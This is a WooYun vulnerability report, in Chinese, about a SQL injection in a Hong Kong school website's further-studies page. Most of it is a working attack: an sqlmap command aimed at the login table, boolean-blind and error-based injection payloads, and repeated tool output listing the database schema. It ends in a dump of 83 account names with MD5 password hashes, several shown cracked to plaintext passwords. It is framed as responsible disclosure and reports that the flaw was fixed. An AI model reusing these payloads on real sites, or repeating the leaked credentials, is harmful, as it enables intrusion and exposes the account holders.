乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-25: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经确认,细节仅向厂商公开 2015-10-29: 厂商已经修复漏洞并主动公开,细节向公众公开
香港拔萃男书院某处存在sql插入漏洞(可获得用户登录密码)
测试地址:http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11
python sqlmap.py -u "http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11" -p parentid --technique=BE --random-agent -D swims -T login -C login,passwd --dump --threads=10
---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11---web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3, PHP 5.2.5back-end DBMS: MySQL 5.0current user: 'swims_view@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'swims_view'@'localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11---web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3, PHP 5.2.5back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] swimssqlmap resumed the following injection point(s) from stored session:---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11---web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3, PHP 5.2.5back-end DBMS: MySQL 5.0Database: swims[5 tables]+-----------+| section || content || log || login || templates |+-----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11---web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3, PHP 5.2.5back-end DBMS: MySQL 5.0Database: swimsTable: login[9 columns]+------------+-------------+| Column | Type |+------------+-------------+| session | varchar(32) || ip | varchar(15) || lastip | varchar(15) || laststatus | int(1) || lasttime | int(11) || login | varchar(32) || passwd | varchar(32) || slevel | int(1) || type | int(1) |+------------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARsqlmap resumed the following injection point(s) from stored session:---Parameter: parentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentid=5 AND 4092=4092&sid=11 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11---web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3, PHP 5.2.5back-end DBMS: MySQL 5.0Database: swimsTable: login[83 entries]+-------------------+----------------------------------------------+| login | passwd |+-------------------+----------------------------------------------+| 10km | 9aa2eb58d61546c12062cd3f9456a5d1 || aa | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty) || admissionnewsclip | 8118c2d628b8366ae3f24a6bcac8c16f || art | 002d25e087bb1a7f1dc252ff5e48f005 || astronomy | c3f8326e6f0cc970cc71e61358e19a81 || av | 1449a8ddaf572b9301467467e6b6339e || aviation | 15cc4b82249c7b030de7ea16a3216a1e || boarding | 2bb53bb81d373a2b4f072e01e655085f || bridge | 8d2f6b5e556ad014146a93a1d8b9ab23 || bs | 4e333762c9f4a75e6bf8958ea06411aa || bsd | 192de2b21c647bf17b7f5abb7d5383f7 || cdrama | cdc9ae8277415733ad81ddc6a07981c2 || cf | 5ce73527feaadc85e2476af0ecc4328d (jesus!) || chem | f08f90ffbf587b05e26f17616aea73ee || chess | 46e44aa0bc21d8a826d79344df38be4b (123qweASD) || chihist | 21ef6578156b72a3437d9a0a12bd6586 || chinese | f679585e513e53560c45c3eb3d8f0f1a || chist | a356eab069e616150d8e6ecb916b54b8 || christian_fellow | 5ce73527feaadc85e2476af0ecc4328d (jesus!) || civic | c89ea82733108fc18e313df856c06c69 || clit | 53b69cccf5cb56ddf840a87777454367 || cs | 94b6c955e00906fb624054440a30b316 || dbsfoundation | 8dbe46fcc067742bd8b714054d1f9d50 || dbspta | 95de7d8c91d5e8bfb8d44acc00b6a6b0 || discipline | 83d270632c591d1a2d03bd46389c469b || dse | b4c05802f985c1afabc09bb798241d40 || dt | cf4cdc9a5e4d358dd07ba2b8393a2488 || ecs | 473db90092021f87fa0a63f9ef425c1b || english | e13640f4976a0907fc7c1d234ff6494d || englit | 1ac1d1b636cc832803ed530293385daf || es | 30170728ebb8b4d60c2c9b812ac1b8dc || film | 464abfcded00e155ad5889d869db374e || fitness | 7f2b344bd50be2eb0f1b42626bd09834 || french | d9cc313b5aa1f565080147bc2ca8499a || frenchclub | 22f50be93526facc4ca1fc278ee1c179 (123666) || furtherstudies | c352c4e5fad78f8a6c46a5a3d57861f2 || geog | 2724f752f24063e574c81c348a8d1796 || german | d1449c30287f1c2bb4b3ec73d295c970 || gifted | d50421f925321162959c0d316dbcd869 || golf | 9adf5339387a8d22144f446a92825639 || hist | 60b80a112b377d52354a876528866b10 || history | 41fc5fb9a61826dfb8e15f1282e87683 || ib | 089cc6d2ee24461120321e10b5726b86 || ib2 | 0b64ae66d9cb7d486112d8ae4401b299 || interschoolsports | 8c5d801f845c0b895e57daf839f8bafa || itwg | e6636644175f9929297189ab8cc07bbf || japan | 51f6f8fe03a390d3de50ad49913d4b66 (123459) || liberal | ede4c8eecb58a906d62f4b34570213b9 || mac | ae1984395283212c7e80f957c33e0f2b || magic | 58d9fc4c07b9d40af63d927cfbc14e28 || martial | b69590c12f099d6cc07886f338d05620 || maths | 5ae3295dd469f90a9f10c8f1a6958459 || mgeog | 12f3c96e3c90308dd19e2905aeee15e9 || mmusic | 18ff6fa7f4eca64df1b3ffc80ee42518 || music | 1a4d4ac1a856d940d06f8acf221cea64 || nss | 8cd211b9d2d45c858d258bbaac786a21 || ocean | 5c8e51474d56c3c9a8d66f5c322f837b || oi | 4f4800afe4fc855934925fe9fc34a540 || orient | 912bd9472e011e911020fe6cc0e5d4fd || parents | db34ea86820b356e164ee3c2177a2f30 || pe | 5a8dd3ad0756a93ded72b823b19dd877 (hello!) || phil | bad2d158a6b400f2e239b148c52f50ed || phototeam | b7ed6efbb82513e00d32677557c92367 || psych | 3c4b15a545de56b7625e8a615ee56280 || puto | 440f81760c3f988302f8aad3956458de || puzzle | 016b51b6479c0a46c8e9f293ac930a79 || quintak | ef58bcce3670da846d4c9c5de9f715ec || sc | 0875daa9eebf3080701ec100e3b6052f || science | 8b0dc2e34844337434b8475108a490ab (hohoho) || skygarden | f35b2e980682264dc65a1eb332cfddee || smath | a83862769f78fffb512bc9283007ef67 (maxmax) || social | 1b7037d2fece1fb637abe26d058f4a8a (social123) || socialsoc | 9f9fb8fa8c9308d1a84db37317c34acf || sports | 5a8dd3ad0756a93ded72b823b19dd877 (hello!) || sportsfed | ede476f066abde060a857477d38ef47e || stamp | c1c824cfd0c5499563b055525035c137 (marcopolo) || swim | f6ead7bf3faa8ad4be6310874328ad80 || swimming | 862cdea78c758ed6d664cc6af403b4a9 || tennis | 7daacea5f373b4c1c054158b126d317f (dennis) || test | 05a671c66aefea124cc08b76ea6d30bb (testtest) || testsite | 16d7a4fca7442dda3ad93c9a726597e4 (test1234) || varts | 079dec77a9ae897a8dcc0d9f1a6c9cdf || waterpolo | 397315245557848ce2a4207139d81827 |+-------------------+----------------------------------------------+
增加过滤。
危害等级:高
漏洞Rank:12
确认时间:2015-10-28 12:00
已將事件通知有關機構
2015-10-29:相關機構回報已修復漏洞